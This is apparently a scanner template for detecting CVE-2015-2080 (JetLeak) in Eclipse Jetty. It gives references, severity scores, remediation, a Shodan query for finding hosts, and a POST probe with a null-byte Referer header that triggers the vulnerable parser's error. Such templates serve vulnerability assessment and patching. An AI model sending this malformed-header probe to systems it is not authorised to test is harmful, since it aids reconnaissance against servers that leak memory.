Description
Eclipse Jetty before 9.2.9.v20150224 allows remote attackers to obtain sensitive information from process memory via illegal characters in an HTTP header.
Eclipse Jetty before 9.2.9.v20150224 allows remote attackers to obtain sensitive information from process memory via illegal characters in an HTTP header.
id: CVE-2015-2080
info:
name: Eclipse Jetty <9.2.9.v20150224 - Sensitive Information Leakage
author: pikpikcu
severity: high
description: Eclipse Jetty before 9.2.9.v20150224 allows remote attackers to obtain sensitive information from process memory via illegal characters in an HTTP header.
impact: |
Remote attackers can retrieve sensitive information from process memory, leading to potential data leakage.
remediation: |
Update to version 9.2.9.v20150224 or later.
reference:
- https://github.com/eclipse/jetty.project/blob/jetty-9.2.x/advisories/2015-02-24-httpparser-error-buffer-bleed.md
- https://blog.gdssecurity.com/labs/2015/2/25/jetleak-vulnerability-remote-leakage-of-shared-buffers-in-je.html
- http://packetstormsecurity.com/files/130567/Jetty-9.2.8-Shared-Buffer-Leakage.html
- https://nvd.nist.gov/vuln/detail/CVE-2015-2080
- http://dev.eclipse.org/mhonarc/lists/jetty-announce/msg00074.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2015-2080
cwe-id: CWE-200
epss-score: 0.75441
epss-percentile: 0.99489
cpe: cpe:2.3:o:fedoraproject:fedora:22:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: fedoraproject
product: fedora
shodan-query: cpe:"cpe:2.3:o:fedoraproject:fedora"
tags: cve2015,cve,jetty,packetstorm,fedoraproject,vuln
http:
- method: POST
path:
- "{{BaseURL}}"
headers:
Referer: \x00
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Illegal character 0x0 in state"
- type: status
status:
- 400
# digest: 4a0a0047304502207ecd2c45b1d5e8208ffa8efb9dbd6058be90859bf11c7460241032a0a627970d02210086a16b739810f6a0648a0fefa067f8d520190e2c801f60efe92a78eb5181884c:922c64590222798bb761d5b6d8e72950
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.